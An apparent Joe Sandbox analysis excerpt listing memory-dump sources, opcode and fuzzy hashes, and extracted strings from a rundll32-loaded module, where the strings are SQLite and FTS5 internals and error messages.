                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: , ?$,%s(?)$4$PRAGMA %Q.page_size$compress$content$error parsing prefix parameter: %s$languageid$matchinfo$missing %s parameter in fts4 constructor$no such column: %s$notindexed$order$prefix$simple$tokenize$uncompress$unrecognized parameter: %s
                                                                                                                                                        • API String ID: 0-404594414
                                                                                                                                                        • Opcode ID: 18d0edb15c515c3215c8d33291b00e22f11e3904caac645c9543afe1003bb59b
                                                                                                                                                        • Instruction ID: 41428adf634d7eb44970a52bf4d1a439516d69d0fd73bbdbe671d5a41814dfdd
                                                                                                                                                        • Opcode Fuzzy Hash: 18d0edb15c515c3215c8d33291b00e22f11e3904caac645c9543afe1003bb59b
                                                                                                                                                        • Instruction Fuzzy Hash: 8CD26C23F09A4685EB148F25A8A0A7927A1FF45B94F150236DE7E8B7E8DF3CE545C700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: .$:$:$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                        • API String ID: 0-3693326857
                                                                                                                                                        • Opcode ID: 84064367d166328c73bafa2deacc8719837e885c81f3bc5b75f58f6c58ee12b6
                                                                                                                                                        • Instruction ID: e35d1905b8508dd7b148df7855b9d9d7dabd2bc811d5d25be18d11b2f84d88dd
                                                                                                                                                        • Opcode Fuzzy Hash: 84064367d166328c73bafa2deacc8719837e885c81f3bc5b75f58f6c58ee12b6
                                                                                                                                                        • Instruction Fuzzy Hash: 15615B93B205984BE749C73EBC22BED2B95A390344F084239EA55DFBC6E929E6018741
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s mode not allowed: %s$/$/$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                        • API String ID: 0-3326250075
                                                                                                                                                        • Opcode ID: 72810fc45149092ed43ee729b48025bb36086465848980857dd08bbe2587332e
                                                                                                                                                        • Instruction ID: 70b3d5093686276e31878d8c814a271143faf0afb8c28f9530f535529df993d9
                                                                                                                                                        • Opcode Fuzzy Hash: 72810fc45149092ed43ee729b48025bb36086465848980857dd08bbe2587332e
                                                                                                                                                        • Instruction Fuzzy Hash: 5522E372B0C68245FB658B1094A5B796791AF02FA4F084335CAFEC76DEDFACE6458700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ascii$bm25$fts5$fts5_get_locale$fts5_locale$fts5_source_id$highlight$porter$snippet$trigram$unable to delete/modify user-function due to active statements$unicode61
                                                                                                                                                        • API String ID: 0-4043592257
                                                                                                                                                        • Opcode ID: f48e727da072867997ef0755314921f6dc712e2f250b6bfa31cab2cfe934122d
                                                                                                                                                        • Instruction ID: 9360a6bdb49d7c09388496021c59ae0357bbd63d150d911e21ab62d7b91c3b2f
                                                                                                                                                        • Opcode Fuzzy Hash: f48e727da072867997ef0755314921f6dc712e2f250b6bfa31cab2cfe934122d
                                                                                                                                                        • Instruction Fuzzy Hash: 3BA28F63F09B4286EB588F21D5A0AF927A6FB54B88F444236CA7D477D9DF3CE4658300
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: PRIMARY KEY$UNIQUE$UPDATE "%w".sqlite_master SET sql = sqlite_drop_column(%d, sql, %d) WHERE (type=='table' AND tbl_name=%Q COLLATE nocase)$after drop column$cannot %s %s "%s"$cannot drop %s column: "%s"$cannot drop column "%s": no other columns exist$drop column from$no such column: "%T"$q$view$virtual table
                                                                                                                                                        • API String ID: 0-74819023
                                                                                                                                                        • Opcode ID: 9042b0255d86f7771479d4dcec3536c4bf197c45786653786b373156b6fcd31f
                                                                                                                                                        • Instruction ID: 667b6ec311f83549b5e3ebc7c224365b2423c3dbabe0a4ee00b9231c5841ad16
                                                                                                                                                        • Opcode Fuzzy Hash: 9042b0255d86f7771479d4dcec3536c4bf197c45786653786b373156b6fcd31f
                                                                                                                                                        • Instruction Fuzzy Hash: 81229D32B0968686D760CF16D0A4BBA77A5FB84B84F458236DAAEC7799DF3CD441C700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %r %s BY term out of range - should be between 1 and %d$INTERSECT$LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                        • API String ID: 0-3976573709
                                                                                                                                                        • Opcode ID: 662fe615cfab7b1aa0e8cae44b99fcdbb085a495a7ab937f8e549f149255944c
                                                                                                                                                        • Instruction ID: d3a20b25d63c9785bc93d25aa39fccf8bdd1e533adc4e2c9a39ed2a09f33c341
                                                                                                                                                        • Opcode Fuzzy Hash: 662fe615cfab7b1aa0e8cae44b99fcdbb085a495a7ab937f8e549f149255944c
                                                                                                                                                        • Instruction Fuzzy Hash: 0CB26B33F0968686EB648F15E4A0AAA77A1FB84B84F154235CA7E876D9DF3DF441C700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s at line %d of [%.10s]$%s_segments$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$block$misuse
                                                                                                                                                        • API String ID: 0-2527169551
                                                                                                                                                        • Opcode ID: 72fc9abc3216e37d0a97fda0f9c95098eb99fd165d6eda51d167a51064e9877b
                                                                                                                                                        • Instruction ID: afeb56ad4649825a1393d4bf21e41e1c42a527382a5bb23f017731ce60e1d6a3
                                                                                                                                                        • Opcode Fuzzy Hash: 72fc9abc3216e37d0a97fda0f9c95098eb99fd165d6eda51d167a51064e9877b
                                                                                                                                                        • Instruction Fuzzy Hash: 92037822F09A42C5FB148F6594A0BB927A1AF44B88F144635CF7EA77D9DF3CE8658340
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s a subset of columns on fts5 contentless-delete table: %s$%s contentless fts5 table: %s$'delete' may not be used with a contentless_delete=1 table$cannot DELETE from contentless fts5 table: %s$cannot UPDATE$delete$fts5_locale() requires locale=1$version
                                                                                                                                                        • API String ID: 0-2196455284
                                                                                                                                                        • Opcode ID: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                        • Instruction ID: b07a9974b955a2cba5e8740920d287ae0b05a764a6e8cc1026fdf19f50f84972
                                                                                                                                                        • Opcode Fuzzy Hash: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                        • Instruction Fuzzy Hash: BCF18E63F0865286EB74DA6694B4E7A2790FB44B84F084231DF7D8B6E9DF7CE4918700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                        • API String ID: 0-875588658
                                                                                                                                                        • Opcode ID: bf43de3a7a1ef586eda6972bc2beddbcc110bd200d6249d6b8ac2510eef92ec7
                                                                                                                                                        • Instruction ID: d224634b1e08c76ec7f8b6e86cec635b6bb92c52e32e7241593763f5a0593145
                                                                                                                                                        • Opcode Fuzzy Hash: bf43de3a7a1ef586eda6972bc2beddbcc110bd200d6249d6b8ac2510eef92ec7
                                                                                                                                                        • Instruction Fuzzy Hash: A1026C62F0964289FB25CF65D4A0AFC23A1AF44788F144232DE7ED66DDDE3CA845C345
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: @$BINARY$E$Expression tree is too large (maximum depth %d)$NOCASE$ON clause references tables to its right$false
                                                                                                                                                        • API String ID: 0-1048875598
                                                                                                                                                        • Opcode ID: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                        • Instruction ID: 7f1cf3719f93a1f1a0c1eecaad30ccee92ecf1a085a6a71b0d0f602bc460fd19
                                                                                                                                                        • Opcode Fuzzy Hash: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                        • Instruction Fuzzy Hash: 5BD2AB63F0968186EB648F269160B7967A1FB45B88F049236DE7E877C9DF3CE450C780
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                        • API String ID: 0-3346138532
                                                                                                                                                        • Opcode ID: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                        • Instruction ID: d77e283bcaed0241f4a7b47f60c9bd7b4e927d9d4b54c3ce53eb12f5f8c5e370
                                                                                                                                                        • Opcode Fuzzy Hash: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                        • Instruction Fuzzy Hash: B2824E73F0868686E7649B15E060AAEB7A1FB84B84F144235DABD47B99DF3DF441CB00
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                        • API String ID: 0-3346138532
                                                                                                                                                        • Opcode ID: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                        • Instruction ID: 56be3c950c9a56a956f26b3f98ab54f63d63a4ce6cdd50dc259a492c5a9cb8d0
                                                                                                                                                        • Opcode Fuzzy Hash: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                        • Instruction Fuzzy Hash: 8C724F73B0868686E7648F15E060AAEB7A1FB84B84F144235DBBD47A99DF7DF441CB00
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %r %s BY term out of range - should be between 1 and %d$%r ORDER BY term does not match any column in the result set$GROUP$HAVING clause on a non-aggregate query$ORDER$aggregate functions are not allowed in the GROUP BY clause$too many terms in ORDER BY clause
                                                                                                                                                        • API String ID: 0-2302332886
                                                                                                                                                        • Opcode ID: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                        • Instruction ID: 40830b741ba7dbb6438ef1351060d3433ac6ef9f66dbec984d8a04840c358153
                                                                                                                                                        • Opcode Fuzzy Hash: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                        • Instruction Fuzzy Hash: 57325A73F08A868AEB14CF65C5A0AB937A1FB45B88F544235DE2D876C9EF38E455C340
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$DELETE FROM '%q'.'%q_idx' WHERE (segid, (pgno/2)) = (?1, ?2)$REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)$block$misuse
                                                                                                                                                        • API String ID: 0-1819929800
                                                                                                                                                        • Opcode ID: bd89727e5068aead3f2d4e281f5654921a63d7a149d2a662b393578461b50661
                                                                                                                                                        • Instruction ID: 13ba1f94b297414c541d2859099300203eacb5bf75db310187b566ab60e7f36b
                                                                                                                                                        • Opcode Fuzzy Hash: bd89727e5068aead3f2d4e281f5654921a63d7a149d2a662b393578461b50661
                                                                                                                                                        • Instruction Fuzzy Hash: 77F26772F09642CAEB188F25D4A4AB827A1FB44B84F554236DE3E877D9DF3DE8458340
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                                                                                                                        • API String ID: 0-741541785
                                                                                                                                                        • Opcode ID: 9d4de8570c36845f642ade2fad82eb86383861f0a6ef88940a649f47f1b0b908
                                                                                                                                                        • Instruction ID: 697a0911a96385ced2e947b0580c9555e4e16af600e952bd7bbdffd67ad0bb14
                                                                                                                                                        • Opcode Fuzzy Hash: 9d4de8570c36845f642ade2fad82eb86383861f0a6ef88940a649f47f1b0b908
                                                                                                                                                        • Instruction Fuzzy Hash: FF127D73B0A6428AE754CB25D4A0ABD37A1FB84744F55423ADA7DC7BD8EF78E4418B00
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
